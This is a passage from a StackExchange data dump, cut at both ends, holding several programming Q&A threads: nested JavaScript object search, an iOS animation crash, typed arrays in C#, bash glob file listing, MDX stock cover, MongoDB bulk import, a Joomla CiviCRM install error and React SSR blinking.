\"id\": \"FG1\",\n \"children\": [{}]\n }]\n }]\n }]\n}\n<\/code>\nComment: This seems like a homework task, it's obvious you should write a recursive method to walk down the tree.\nComment: Please show what you tried\nComment: Please share a [Minimal, Complete, and Verifiable example](https:\/\/stackoverflow.com\/help\/mcve) of your first approach (code)\nAnswer: You could use this function:\n\n<code>function findChild(obj, condition) {\n if (Object.entries(condition).every( ([k,v]) => obj[k] === v )) {\n return obj;\n }\n for (const child of obj.children || []) {\n const found = findChild(child, condition);\n \/\/ If found, then add this node to the ancestors of the result\n if (found) return Object.assign({}, obj, { children: [found] });\n }\n}\n\/\/ Sample data\nvar input = { \"children\": [{ \"name\": \"Home\", \"title\": \"Home\", \"id\": \"home1\", \"children\": [] }, { \"name\": \"BUSINESS AND ROLE SPECIFIC\", \"title\": \"BUSINESS AND ROLE SPECIFIC\", \"id\": \"BAR1\", \"children\": [{ \"name\": \"Global Businesses\", \"title\": \"Global Businesses\", \"id\": \"GB1\", \"children\": [{ \"name\": \"Commercial Banking\", \"title\": \"Commercial Banking\", \"id\": \"CB1\", \"children\": [{ \"name\": \"FLAGSHIP PROGRAMMES\", \"title\": \"FLAGSHIP 
PROGRAMMES\", \"id\": \"FG1\", \"children\": [] }] }] }] }, { \"name\": \"RISK MANAGEMENT\", \"title\": \"RISK MANAGEMENT\", \"id\": \"RM1\", \"children\": [] } ]},\n search = { id: 'FG1' };\n\nconsole.log(findChild(input, search));<\/code>\n<code>.as-console-wrapper { max-height: 100% !important; top: 0; }<\/code>\n\nYou can use this also for searching with multiple conditions, which must be true at the same time:\n<code>search = { \"name\": \"Global Businesses\", \"title\": \"Global Businesses\" };\n<\/code>\n... would give you the object that has the specified name and title.\nFollow-up question\nYou asked in comments:\n\nIs there way to supply number to not remove children for given node in input. like,\n<code>const donotRemoveChildNode = 2; \nconsole.log(findChild(input, search, donotRemoveChildNode )); \n<\/code>\n...so it will not remove that specific node's children if it matches condition?\nHere, if we search for <code>{ id: 'FG1'}<\/code> and supply <code>donotRemoveChildNode = 2<\/code>, it would not remove the first level children for \"Commercial banking\".\n\nI would say the <code>donotRemoveChildNode<\/code> would have to be 3, as there are three levels of <code>children<\/code> arrays in the ancestor-hierarchy of the \"Commercial banking\" node. A value of 0 would show the first level children of the top-most <code>children<\/code> property.\nHere is how that extra argument would work -- I added some records to the data to illustrate the difference in the output:\n\n<code>function findChild(obj, condition, removeChildNodesBefore = Infinity) {\n if (Object.entries(condition).every( ([k,v]) => obj[k] === v )) {\n return obj;\n }\n for (const child of obj.children || []) {\n let found = findChild(child, condition, removeChildNodesBefore - 1);\n if (found) {\n return Object.assign({}, obj, { \n children: removeChildNodesBefore <= 0 \n ? obj.children.map( sibling => \n sibling == child ? found \n : Object.assign({}, sibling, {children: []}) \n )\n : [found]\n });\n }\n }\n}\n\nvar input = { \"children\": [{ \"name\": \"Home\", \"title\": \"Home\", \"id\": \"home1\", \"children\": [] }, { \"name\": \"BUSINESS AND ROLE SPECIFIC\", \"title\": \"BUSINESS AND ROLE SPECIFIC\", \"id\": \"BAR1\", \"children\": [{ \"name\": \"Global Businesses\", \"title\": \"Global Businesses\", \"id\": \"GB1\", \"children\": [{ \"name\": \"test\", \"title\": \"test\", \"id\": \"xxx\", \"children\": [{ \"name\": \"testDeep\", \"title\": \"test\", \"id\": \"deep\", \"children\": []}]}, { \"name\": \"Commercial Banking\", \"title\": \"Commercial Banking\", \"id\": \"CB1\", \"children\": [{ \"name\": \"test\", \"title\": \"test\", \"id\": \"yyy\", \"children\": []}, { \"name\": \"FLAGSHIP PROGRAMMES\", \"title\": \"FLAGSHIP PROGRAMMES\", \"id\": \"FG1\", \"children\": [] }] }] }] }, { \"name\": \"RISK MANAGEMENT\", \"title\": \"RISK MANAGEMENT\", \"id\": \"RM1\", \"children\": [] } ]},\n search = { id: 'FG1' }\n\nconsole.log(findChild(input, search, 3));<\/code>\n<code>.as-console-wrapper { max-height: 100% !important; top: 0; }<\/code>\nComment: thanks for reply, I need to have returned value from root till found object in hierarchy not just matching object.\nComment: So you want a tree that has siblings *removed* from the ancestors's children? I have updated my answer to do just that. Can you check?\nComment: thanks, exactly I was looking for, also I am not good with javascript but is there way to supply number to not remove children for given node in input. 
like, const donotRemoveChildNode = 2; console.log(findChild(input, search, donotRemoveChildNode )); so it will not remove that specific node's children if it matches condition?, here if search for id : 'FG1' and supply donotRemoveChildNode = 2 so it will not remove first level children for Commercial banking?\nComment: Do you mean *only* first level children, meaning that those children should have their own `children` property always equal to `[]`, even if they have children in the original input?\nComment: Anyway, I interpreted it like that, and added a section to my answer. Do you like it?\nComment: thanks for it, I did not get chance to look at it yesterday. i have updated js fiddle, I think it is still returning not correct result or may be I was not correct in writing. jsfiddle: https:\/\/jsfiddle.net\/L0nwunqd\/2\/, on jsfiddle I am searching for `{\n guid: '677b7bc1-f429-4f2b-9347-463ac1aa89f7'\n}` so it should return below result till hierarchy with children of matching guid and it should also return children of nth element if nth element is part of hierarchy. I have added expected return in jsfiddle, any help would be much appreciated.\nAnswer: <code>function getBranch(branches, leaf_id)\n{ \n var result_branch = null;\n\n branches.some(function(branch, idx) {\n if (branch.id == leaf_id) {\n result_branch = Object.assign({}, branch);\n result_branch.children.forEach(function(child, idx) {\n delete result_branch.children[idx].children;\n });\n\n return true;\n } else {\n let target_branch = getBranch(branch.children, leaf_id);\n\n if (target_branch) {\n result_branch = Object.assign({}, branch);\n delete result_branch.children\n result_branch.children = [target_branch];\n\n return true; \n }\n }\n\n return false;\n });\n\n return result_branch;\n}\n\nconsole.log(getBranch(input.children, 'GB1'));\n<\/code>\nComment: thanks @y-bond for function, i tried above function but even if I search for \"GB1\" it return everything from root till all child, I need to get from root till \"GB1\" with first level children in return.\nComment: ok, I've updated the function. 
If I get you right, it can work the way you want\nAnswer: One way is to first loop the root children, and then create another function to see if the Id exists in any of it's children.\n\n<code>var data = {\n \"children\": [{\n \"name\": \"Home\",\n \"title\": \"Home\",\n \"id\": \"home1\",\n \"children\": []\n },\n {\n \"name\": \"BUSINESS AND ROLE SPECIFIC\",\n \"title\": \"BUSINESS AND ROLE SPECIFIC\",\n \"id\": \"BAR1\",\n \"children\": [{\n \"name\": \"Global Businesses\",\n \"title\": \"Global Businesses\",\n \"id\": \"GB1\",\n \"children\": [{\n \"name\": \"Commercial Banking\",\n \"title\": \"Commercial Banking\",\n \"id\": \"CB1\",\n \"children\": [{\n \"name\": \"FLAGSHIP PROGRAMMES\",\n \"title\": \"FLAGSHIP PROGRAMMES\",\n \"id\": \"FG1\",\n \"children\": []\n }]\n }]\n }]\n },\n {\n \"name\": \"RISK MANAGEMENT\",\n \"title\": \"RISK MANAGEMENT\",\n \"id\": \"RM1\",\n \"children\": []\n }\n ]\n};\n\nfunction hasId( id, data ) {\n if (data.id === id) return true;\n if (data.children) {\n for (const child of data.children) {\n if (hasId( id, child)) return true;\n }\n }\n return false;\n}\n\nfunction search( id, data ) {\n for (const child of data.children) {\n if (hasId(id, child)) return child;\n }\n return null;\n}\n\nconsole.log(search( \"FG1\", data ));<\/code>\nComment: thanks for reply, it return all children from root I only want to select children who is part of hierarchy, so let say if I search for \"FG1\" then any of it parents's not all children should return except which are in path to reach \"FG1\"\nComment: @oypatel `it return all children from root ` Not it doesn't.. Did you run the snippet above?\nComment: yes I did and it return all children from parent, I have created jsfiddle for same. can you plesae have quick look? https:\/\/jsfiddle.net\/uz0a3LpL\/1\/\nComment: My snippet returns what your question say's it should, & your fiddle's source object is in a different format to your question. IOW: Your question shows an object with a property called children, your fiddle is an array at it's root.. What is it?..\nComment: IOW: Press the button above that say's `Run code snippet`, examine the output. You basically have 3 root nodes.. `home1`, `BAR1` & `RM1`, obviously `BAR1` is what we want, but can you see any reference to `home1` & `RM1` in the above output after running snippet.\nComment: Thanks for reply @Keith, I have updated jsfiddle now with same format as question. I want to have entire object hierarchy from root till object found. sorry for confusion\nComment: Your fiddle returns `LEADERSHIP` as the root, is this what you want?, but you have done -> `$(\"div#result\").html(search( \"1c80b174-54b0-469c-8522-64a606308561\", data ));` an object is not HTML,.. 
You could `JSON.stringify` Here is your fiddle updated doing that -> https:\/\/jsfiddle.net\/uz0a3LpL\/2\/\n","meta":{"source":"stackoverflow","title":"Search nested object and return whole path","dup_signals":{}},"subset":"stackexchange"} +{"text":"getting access EXC_BAD_ACCESS when doing animation\n\nQuestion: I am doing an animation, so when you click a button MyAccount from the first screen it will navigate you to Account View\n<code>- (void)pushToAccount\n{\n AccountViewController *controller = [[AccountViewController alloc] initWithNibName:@\"AccountViewController\" bundle:nil];\n \/\/[self.navigationController pushViewController:controller animated:NO];\n\n [UIView beginAnimations: @\"Showinfo\"context: nil];\n [UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];\n [UIView setAnimationDuration:0.75];\n [self.view addSubview:controller.view];\n [UIView setAnimationTransition:UIViewAnimationTransitionFlipFromRight forView:self.view cache:NO];\n [UIView commitAnimations];\n\n}\n<\/code>\nHowever, whenever i click on the Account View Controller ( contains some buttons and images view in it ), my program is crashing at it show EXC_BAD_ACCESS at main class\nPlease advice me on this issue...\nComment: check your controller's viewDidLoad is called?\nComment: yes, just put a break point and it is called\nComment: start debugging from there by adding breakpoint to all methods and find out where it gets bad excess.\nAnswer: Your view controller is trying to animate a transition by adding another view controller's view as a subview of your current view. That's problematic on a whole bunch of dimensions. Notably, you're not doing anything with the new view controller itself ... if this was an ARC project, it will get released on you.\nIf you just want to transition from one view controller to another, you should generally either do a standard <code>pushViewController:animated:<\/code> or <code>presentModalViewController:animated:<\/code>. It looks like you used to do the former. 
Why did you replace it with the current code?\nIf you can tell us what you were trying to do, why you're not using the standard transitions, perhaps we can help you further.\nUpdate:\nIf you don't like the default animation, but rather want some custom animation to your transition, you can do something like:\n<code>CustomAnimationViewController *yourNewViewController = [[CustomAnimationViewController alloc] initWithNibName:@\"CustomAnimationView\" bundle:nil];\n\n[UIView beginAnimations:nil context:nil];\n[UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];\n[UIView setAnimationDuration:0.75];\n[self.navigationController pushViewController:yourNewViewController animated:NO];\n[UIView setAnimationTransition:UIViewAnimationTransitionFlipFromRight forView:self.navigationController.view cache:NO];\n[UIView commitAnimations];\n\n\/\/ if you're using ARC, you don't need this following release, but if you're not using ARC, remember to release it\n\n\/\/ [yourNewViewController release];\n<\/code>\nUpdate 2:\nAnd, anticipating the logical follow-up question, how do you animate the dismissal of the new view controller, you might, for example have a \"done\" button that invokes a method like the following:\n<code>- (IBAction)doneButton:(id)sender \n{\n [UIView beginAnimations:nil context:nil];\n [UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];\n [UIView setAnimationDuration:0.75];\n [UIView setAnimationTransition:UIViewAnimationTransitionFlipFromLeft forView:self.navigationController.view cache:NO];\n [UIView commitAnimations];\n\n [UIView beginAnimations:nil context:NULL];\n [UIView setAnimationDelay:0.375];\n [self.navigationController popViewControllerAnimated:NO];\n [UIView commitAnimations];\n}\n<\/code>\nComment: @ttran Anticipating that you'd next ask how to animate the dismissal of the new view controller, I've updated my answer accordingly.\nComment: what I am trying to do is to animate the transition. Firstly,I followed the tutorial at [here](http:\/\/www.devx.com\/wireless\/Article\/42476\/0\/page\/3) and they use `addSubview`.However.Later on, I also found another solution from stackOverFlow at [here](http:\/\/stackoverflow.com\/questions\/3838219\/showing-pushviewcontroller-animation-look-like-presentmodalviewcontroller) and they are all about to animate the transition.Therefore,when I did it, I were getting crash in the middle of the way but I did not have the solution for the error at all\nComment: @ttran I think that first solution is pretty bad (not ARC friendly, not preserving the navigationController stack, etc.), but that second solution is solid. I've updated my answer accordingly with a custom animation, preserving the `pushViewController` invocation. I just tested it and it works fine.\nAnswer: My guess is that you have a <code>UIButton<\/code> that will call your <code>pushToAccount<\/code> method when pressed and that when it is pressed it cannot find that method. It coud be because the method signature does not include an object. So if you change your method from\n<code>- (void)pushToAccount\n<\/code>\nto\n<code>- (void)pushToAccount:(id)sender\n<\/code>\nIt may fix your problem. It is also important to make sure that the object that contains the <code>pushToAccount<\/code> method isn't dealloc'd before that method is called. 
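A dealloc override that just logs is enough for that check; a minimal sketch (manual reference counting assumed, as in the question's code — drop the [super dealloc] call under ARC):
<code>- (void)dealloc
{
    NSLog(@"%@ deallocated", NSStringFromClass([self class]));
    [super dealloc];   // manual reference counting only; omit under ARC
}
<\/code>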
Perhaps put an <code>NSLog<\/code> message or a breakpoint inside <code>dealloc<\/code> to make sure it isn't called.\nComment: I dont think so because I can navigate to the account view controller after all but get crash at here.\nAnswer: i think use bellow line\n<code>[UIView setAnimationTransition:UIViewAnimationTransitionFlipFromLeft forView:self.window cache:YES];\n<\/code>\ninsted of your bellow line..\n<code>[UIView setAnimationTransition:UIViewAnimationTransitionFlipFromRight forView:self.view cache:NO];\n<\/code>\nhope this help you...\n:)\nand also for animation use bellow code if required....\n<code>CATransition *animation = [CATransition animation];\n [animation setDelegate:self]; \n [animation setType:kCATransitionFromBottom];\n [animation setDuration:1.0];\n [animation setTimingFunction:[CAMediaTimingFunction functionWithName:\n kCAMediaTimingFunctionEaseInEaseOut]];\n [[self.window layer] addAnimation:animation forKey:kAnimationKey];\n<\/code>\nhere use your view insted of window otherwise windows workfine..\n:)\nComment: my account view does not have window property. it is the just view and some controllers on it..\nComment: yes. Instead of doing `[self.view addSubview:controller.view];` i use `[self.navigationController pushViewController: controller animated:NO];` and it works but I dont know why at all\nComment: for animation if you define code in delgate method and then use it then its work fine otherwise use AppDelegate object and then define objAppdelegate.window .... its work\nComment: then try to addsubview exact line of [view commitAnimation] and other codes are above of addsubview line just try.....\n","meta":{"source":"stackoverflow","title":"getting access EXC_BAD_ACCESS when doing animation","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating Array from type object\n\nQuestion: I am trying to create an array of the type that is known and currently set to <code>Type<\/code>. I have been able to create an <code>IList<\/code> of the type but I am still able to convert that to an array of the type, getting <code>object[]<\/code> instead.\n<code>object propertyValue; \/\/This needs to be an object since it can be set to any object\nType currentType = PropertyInfo.GetType(); \/\/Example: System.String\npropertyValue = GetArray(reader, currentType); \/\/What would this look like to make currentType work?\n\/\/Reflection occuring later to set propertyValue to attribute of String[]\n<\/code>\nHere what I got what working with <code>IList<\/code>, the issue here is not sure how to cast it to an array of <code>currentType<\/code>. I also prefer just getting an array back instead:\n<code>private IList GetArray(Reader reader, Type currentType)\n{\n var returnList = createList(currentType); \n \/\/reader loop that appends to list\n return returnList;\n}\n\npublic IList createList(Type currentType)\n{\n Type genericListType = typeof(List<>).MakeGenericType(currentType);\n return (IList)Activator.CreateInstance(genericListType);\n}\n<\/code>\nComment: I think you would need to `Invoke` the appropriate `ToArray` method.\nComment: For another option, take a look at my answer to https:\/\/stackoverflow.com\/questions\/51679179\/c-sharp-covert-type-into-ienumerable-of-same-type. The second option gets you a reference to a `List` upon which you can call `ToArray()`. However, the underlying List is of the correct type. 
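That reflection-based conversion can be sketched in a couple of lines; here list stands for the IList returned by createList above, and System.Reflection is assumed to be in scope. The resulting array's runtime type is currentType[], even though the variable holding it is typed object:
<code>// Call List<T>.ToArray() through reflection on the list built by createList.
MethodInfo toArray = list.GetType().GetMethod("ToArray");
object typedArray = toArray.Invoke(list, null);   // runtime type: currentType[]
<\/code>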
I don't know of any way to get a correctly typed object reference (`List`), only a reference of type `List`\nComment: I tried to edit my comment, but ran out of time. The code in my answer calls `.ToList()`, but could easily call `ToArray()` instead. Presto, you have an object of type `MyType[]`, however, you can't get a reference to that object that is typed that way; it will be typed `object[]`. I don't know of any way to get a properly typed object reference (aka variable).\nAnswer: Here's an even easier way:\n<code>var stringType = typeof(string);\nvar anArray = System.Array.CreateInstance(stringType, 5);\nvar arrayAsArray = (object[]) anArray;\n<\/code>\nAt that point, the variable <code>anArray<\/code> is typed as an <code>object<\/code>, but refers to an array of 5 strings. The variable <code>arrayAsArray<\/code> is typed as <code>object[]<\/code> and it refers to that same array of strings.\nWhat you can't get (as far as I know) is a variable that it typed <code>MyType[]<\/code> referring to an array of <code>MyType<\/code> instances if all you have is <code>typeof(MyType)<\/code>. The compiler creates typed object references at compile time, you don't get to play in that space.\nOne of the features of the .NET Framework (or flaws, depending on how you look) is that arrays are covariant. There are lots of things that can go bad with array covariance (for example, since the compiler thinks you have an `object[]', it would let you try to add an Elephant instance into your array of strings). However, in this case, it makes your code usable, even if it is somewhat fragile.\nAnswer: It seems you'd like to generate an array of a specified type from a stream of objects. If this is the case then I would approach it like so:\n<code>void Main()\n{\n var file = Path.Combine(\n Environment.GetFolderPath(Environment.SpecialFolder.Desktop),\n \"TestFile.txt\");\n\n var array = GetValues<String>(file).ToArray();\n\n foreach (var item in array)\n {\n Console.WriteLine(item);\n }\n}\n\nprivate IEnumerable<T> GetValues<T>(String file)\n{\n using (StreamReader stream = new StreamReader(file))\n {\n while (true)\n {\n var next = stream.ReadLine();\n if (next == null)\n {\n break;\n }\n yield return (T)Convert.ChangeType(next, typeof(T));\n }\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Creating Array from type object","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bash ls (glob-style)\n\nQuestion: I have an excersise in which I have to print all the file names which are contained in the current folder, which contain in the them one of the letters <code>[a-k]<\/code> and <code>[m-p]<\/code> and <code>[1-9]<\/code> atleast 1 time (each).\nI probably have to use <code>ls<\/code> (glob-style).\nComment: [Don't parse ls](http:\/\/mywiki.wooledge.org\/ParsingLs)\nComment: I'd use `grep` and a regex: `ls -1 | grep -E \"your_regex\"`\nComment: well, I don't know what regex is, and I actually have to use ls I think.. thx\nComment: huh? I have to use ls [glob-style]\nComment: This may help you http:\/\/stackoverflow.com\/q\/14004201\/722238\nComment: this question was originally mine.. xD and no- that doesn't help. 
Now I'm actually solving this thing with egrep, but not sure how do I write that the string must contain atleast 1 time [a-k] [m-p] [1-9] in reg expressions..\nAnswer: If order is important then you can use globbing:\n<code>$ ls *[a-k]*[m-p]*[1-9]*\najunk404 am1 cn5\n<\/code>\nElse just <code>grep<\/code> for each group separately: \n<code>ls | grep \"[a-k]\" | grep \"[m-p]\" | grep \"[1-9]\"\n1ma\najunk404\nam1\ncn5\nm1a\n<\/code>\nNote: <code>ls<\/code> will show directories if you really only want files use <code>find<\/code> inside:\n<code>find . -maxdepth 1 -type f | grep \"[a-k]\" | grep \"[m-p]\" | grep \"[1-9]\"\n<\/code>\nAnswer: A 100% pure bash (and funny!) possibility:\n<code>#!\/bin\/bash\n\nshopt -s nullglob\na=( *[a-k]* )\nb=(); for i in \"${a[@]}\"; do [[ \"$i\" = *[p-z]* ]] && b+=( \"$i\" ); done\nc=(); for i in \"${b[@]}\"; do [[ \"$i\" = *[1-9]* ]] && c+=( \"$i\" ); done\nprintf \"%s\\n\" \"${c[@]}\"\n<\/code>\nNo external processes whatsoever! No pipes! Only pure bash! 100% safe regarding files with funny symbols in their name (e.g., newlines) (and that's not the case with other methods using <code>ls<\/code>). And if you want to actually see the funny symbols in the file names and have them properly quoted, so as to reuse the output, use\n<code>printf \"%q\\n\" \"${c[@]}\"\n<\/code>\nin place of the last <code>printf<\/code> statement.\nNote. The patterns <code>[a-k]<\/code>, <code>[p-z]<\/code> are locale-dependent. You might want to set <code>LC_ALL=C<\/code> to be sure that <code>[a-k]<\/code> really means <code>[abcdefghijk]<\/code> and not something else, e.g., <code>[aAbBcCdDeEfFgGhHiIjJk]<\/code>.\nHope this helps!\nAnswer: If order isn't important, and the letters appear once or more, you can use chained greps.\n<code>ls | egrep \"[a-k]\" | egrep \"[m-p]\" | egrep \"[1-9]\"\n<\/code>\nIf order matters, then just use a glob pattern\n<code>ls *[a-k]*[m-p]*[1-9]*\n<\/code>\nAnswer: To be complete, you need to search all the combinations:\n<code>ls *[a-k]*[m-p]*[1-9]* *[a-k]*[1-9]*[m-p]* \\\n *[m-p]*[a-k]*[1-9]* *[m-p]*[1-9]*[a-k]* \\\n *[1-9]*[m-p]*[a-k]* *[1-9]*[a-k]*[m-p]*\n<\/code>\n","meta":{"source":"stackoverflow","title":"Bash ls (glob-style)","dup_signals":{}},"subset":"stackexchange"} +{"text":"MDX: Calculating MONTH COVER (of Stock) in a performant way\n\nQuestion: this is my dataset:\n\nI want to calculate the \"Cover Month\". Therefore I have to look for Stock(in this example in january 2016 = 5,000), then have a look for each future month if current stock(january 2016) is bigger than \"cum. Sales\" of following month. If yes, then remember value = 1. This should be done for each future month. After this step all remembered values should be added, so result is 4 (Cover Month). Stock will be enough for 4 following months.\nNext step system should do this for next month - dynamically for each month...\nHow can I do this in a performant way?\nIs this the right way:\n<code>Filter([TIME].[Year to Month].currentmember : NULL,\n[Measures].[cum Sales] < [Measures].[Stock])\n<\/code>\n?\nMaybe anybody can give me a hint? Or maybe I need another alternative formula to get a subtotal and then do another calculation?\nThanks in advance, Andy\nComment: why does it show 1 for May-16? 
The cum total is 5700 which is greater than 5000.\nComment: did my answer help or can I delete it?\nAnswer: If you just require a 1 or 0 then can things not be simplified:\n<code>IIF(\n SUM(\n {[TIME].[Year to Month].currentmember : NULL},\n [Measures].[cum Sales]\n ) \n < ([Measures].[Stock],[TIME].[Year to Month].&[Jan-2016]) \/\/<<amend to the date format used in your cube\n,1\n,NULL\n)\n<\/code>\n","meta":{"source":"stackoverflow","title":"MDX: Calculating MONTH COVER (of Stock) in a performant way","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to insert thousands of JSON Array Dumps in Mongodb quickly?\n\nQuestion: I have around 20,000 files with JSON array in them. I would like to DUMP all these files into MongoDB hosted locally. I am using mongoimport for this purpose.\nIs there any way I can speed up the process ?\nThese 20,000 files contains around 12 million records.\nComment: if you have 20,000 json files and 12 million records it sounds like you can't just go json->mongo.. should use something like JAVA or another language that you can do an insert with. It's not going to be a 1-2min job though..\nComment: What do you define as \"quickly\"? There is no real quick way to insert 12 million records.\nAnswer: My Mongo version is 2.6.12 in a linux server with 32 cores. I have imported 134 millions of records into MongoDB. The amount of input files is around 1700 and the format is JSON array. My testing results are as follows:\n\nmongoimport: 100K records a time. Import 100K records in 4min 50s.(Before Mongo version 3.0.0, there is no \"--numInsertionWorkers\" parameters, so I conduct single-threaded import. You can try with that parameter if newer version is available.)\nmongoimport: 50K records a time. Import 100K records in 2min 20s.\nPyMongo (single-threaded): a records a time, use insert method. Import 100K records in 30s.\nPyMongo (multi-threaded, thread number is 8): a record a time. Import 134 millions of records in 1hour 32min. It's nearly linear speedup.\n\nThe reason possibly falls in: A file with 100K records is a large chunk which is time-consuming for \"mongoimport\" to handle. I haven't figured out why PyMongo is faster than mongoimport. Are JSON files processed faster? So, you could probably try with PyMongo in a multi-threaded way.\n","meta":{"source":"stackoverflow","title":"How to insert thousands of JSON Array Dumps in Mongodb quickly?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Joomla installation error: Please enter a package folder. Unable to find install package\n\nQuestion: When I tried installing by uploading the package file, nothing happened. Then I tried exactly as the installation guide says for Joomla and I get this error:\nPlease enter a package folder.\nUnable to find install package\nThis is a new Joomla installation 3.8.5, I am trying to install CiviCRM 4.7.31. I have PHP 5.6. I'm hosted on a shared server so not sure how to check the PHP extensions and configuration or the MySQL version with my cPanel.\nI have never used CiviCRM before but I have been using Joomla for years and never got that error with any installation packages.\nI would love some help and am looking forward to your support. 
\nComment: If you want, please contact me throught the contact form from vicaroh.com and send me the url\/path to the site , in order to check if it is ok...\nAnother trouble can be the memory limit, https:\/\/docs.civicrm.org\/sysadmin\/en\/latest\/requirements\/\nplease, check it, and pleased to keep informed!\nFrancesc\nAnswer: First of all, my apologizes for my english, it is not very fluent.\nNow, my answer: \nHave you checked if this version of CiviCRM is compatible with your host PHP version?\nCiviCRM package is not an Autoinstaller Package as many other extensions: components or plugins.\nI think the process to install is:\n-Upload the compressed CIVICRM package (Check than is a Joomla version) to the 'tmp' folder of your Joomnla installation. Uncompress-Expand it.\n-Now, in your tmp folder there must contains a folder 'com_civicrm\/\nIn administrator\/extensions\/install-uninstall\/install from directory add the \/com_civicrm\/ subfolder at the end and click install.\nIf everything goes right you will get a 'component successfully installed'.\nThe link to Civicrm help : https:\/\/docs.civicrm.org\/sysadmin\/en\/latest\/install\/joomla\/\nGood Luck!\nFrancesc\nComment: Hi Francesc, Thanks for your answer, I actually checked everything and as described in my post, I did the extact procedure described in the CiviCRM joomla installation help. And it didn't work. That's why I asked for help. I really don't see why it wouldn't work and need some more help. Thank you for your further support.\nAnswer: in order to check\/know what versions of php, SQL engine, etc. you can see it at Joomla BAckend, System, System information (last menu item). You will get information about many parameters.\nHave you checked by FTP if the uncompressed folder of com_civicrm exists before going on the installation step via joomla installer?. If you clean the Cach\u00e9, the system deletes the contentsd from the folder \/tmp\/\nAlso, maybe the hosting have any limitations? Have you tried to install in local?(For example with Xammp-bitnamy)\nFrancesc\nComment: Hello and thanks for keeping with me.\nphp version: 5.6.32. \nYes FTP is fine and the folder is uncompressed and located exactly where it is supposed to be. I have not cleared the cache since and my hosting doesn't have limitations, I have a huge pack. I don't install anything in local though. I don't know how this works and have never done it before, I usually have a sandbox DB for tests and the live site. I'm using a brand new sandbox now for this test.\n","meta":{"source":"civicrm.stackexchange","title":"Joomla installation error: Please enter a package folder. Unable to find install package","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get real type of file that user want to upload\n\nQuestion: in my ASP.Net MVC 3 application I have uploading images logic. How can I find out is some file that user try to upload realy an image? I need to check it before uploading , on client side\nComment: Check *what*? You haven't provided a valid criteria.\nAnswer: If you use:\n<code>Image.FromStream(stream)\n<\/code>\nit will throw an ArgumentException if it is not a valid image.\nComment: I see, so how about using the file extension? Not perfect but in combination with a server check it would cover all cases, and cover most on the client side. e.g. 
http:\/\/blog.navayan.com\/jquery-validation-for-file-type-extension\/\nComment: I need to check it before uploading , on client side\n","meta":{"source":"stackoverflow","title":"Get real type of file that user want to upload","dup_signals":{}},"subset":"stackexchange"} +{"text":"React SSR blinks page\n\nQuestion: I created a project with React, react-router, @loadable\/component.\nNow I'm trying to add SSR to this project. \nI did server side rendering with react-router.\nAnd then I added @loadable\/component to import all pages component:\n<code>import loadable from '@loadable\/component';\n\nconst routersConfig = [\n {\n path: '\/',\n component: loadable(() => import('.\/Home')),\n exact: true,\n },\n {\n path: '\/2',\n component: loadable(() => import('.\/Home2')),\n exact: true,\n },\n];\n<\/code>\nThen I added all this parts of code: https:\/\/www.smooth-code.com\/open-source\/loadable-components\/docs\/server-side-rendering\/\nAnd now it works. \nBut It works with the problem: a content blinks while loading.\nHow I understand the page's loading process:\n\nBrowser gets a content generated by SSR (the first query in network tab)\nBrowser renders a content (with left and top margins )\nBrowser downloads two enterpoints and vendors from html (app.js, normalizer.js, vendor.js)\nBrowser executes app.js and normalizer.js. Left and top margins are removed. \nApp.js starts downloading page's chunk - home.js. In this moment content disappears \nWhen home.js is downloaded, the content appears again.\n\nI shoot a video to illustrate this process. (I'm sorry for quality, stackoverflow forbides files which size is more then 2MB ). I'm throttling network speed to imagine all page's download process.\n\nMy question is why the content disappears? How to fix it?\nMy code\nserver.js\n<code>const sheetStyledComponents = new ServerStyleSheet();\n const sheetsJssRegistry = createSheetsRegistry();\n const statsFile = path.resolve(process.cwd(), '.\/build-ssr\/dist\/loadable-stats.json');\n\n const extractor = new ChunkExtractor({\n statsFile,\n entrypoints: [\n 'app',\n 'normalize',\n ],\n });\n\n try {\n const client = ApolloSSRClient();\n\n const tree = (\n <ApolloProvider client={client}>\n <ApplyTheme sheetsRegistry={sheetsJssRegistry}>\n <StaticRouter location={req.url}>\n <Home \/>\n <\/StaticRouter>\n <\/ApplyTheme>\n <\/ApolloProvider>\n );\n\n\/\/ there is combination of Apollo graphql, jss, styledComponent functions\n const body = await getMarkupFromTree({\n renderFunction: flow(\n sheetStyledComponents.collectStyles.bind(sheetStyledComponents),\n extractor.collectChunks.bind(extractor),\n renderToString\n ),\n tree,\n });\n\n const scriptTags = extractor.getScriptTags(); \n \/\/ It isn't used yet\n const linkTags = extractor.getLinkTags(); \n\n const styleTags = sheetStyledComponents.getStyleTags();\n\n const html = (await rawHtml)\n .replace(\n '<\/head>',\n ` \n ${styleTags}\n <style type=\"text\/css\" id='jss-server-side-styles'>\n ${sheetsJssRegistry.toString()}\n <\/style>\n <script>\n window.__APOLLO_STATE__ = ${JSON.stringify(client.extract())};\n <\/script>\n ${scriptTags}\n <\/head>\n `\n )\n .replace('<div id=\"app\"><\/div>', `<div id=\"app\">${body}<\/div>`);\n\n res.send(html);\n<\/code>\nindex.jsx\n<code>const SSRApp = (\n <ApolloProvider client={ApolloClient}>\n <ApplyTheme>\n <BrowserRouter>\n <App \/>\n <\/BrowserRouter>\n <\/ApplyTheme>\n <\/ApolloProvider>\n);\n\nloadableReady(() => (\n ReactDOM.hydrate(\n SSRApp,\n document.getElementById('app'),\n 
)\n));\n<\/code>\nComment: As far as I can understand your js code reap out everything inside ``and render it from scratch. In theory your js shouldn't do that it should connects to existed components inside that ``\nComment: I believe your entire web page is blinking because the entire page is wrapped within which changes the content when you navigate to another page. If you want the header to not blink, you need to move the Header outside of your component. Try that and let me know the results. I am interested in your setup.\nComment: @JoshuaBlevins I have found error. It's just trying to render SSR instead of . You can see it in my code.\nComment: Can we see your component as well as the code where you are using ReactDOM? I think that might help a bit more.\nComment: After reading the documentation on react-router's github repo, we really need to see where your Router is defined, as well as how it is defined.\nComment: @JoshuaBlevins thank you for answer. I have added some code\nComment: @Arseniy-II I think so. But why does my code do this?)\nComment: That makes sense. I am glad that you figured everything out.\nAnswer: It was my fault.\nThe hydration version of app contained BrowserRouter -> Switch -> Router -> HomePage\nAnd the SSR version contained only StaticRouter -> HomePage\nBecause of this, after rendering SSR version, react removed all DOM and created new one with Router.\nComment: i really need help about the blink too. and i'm not 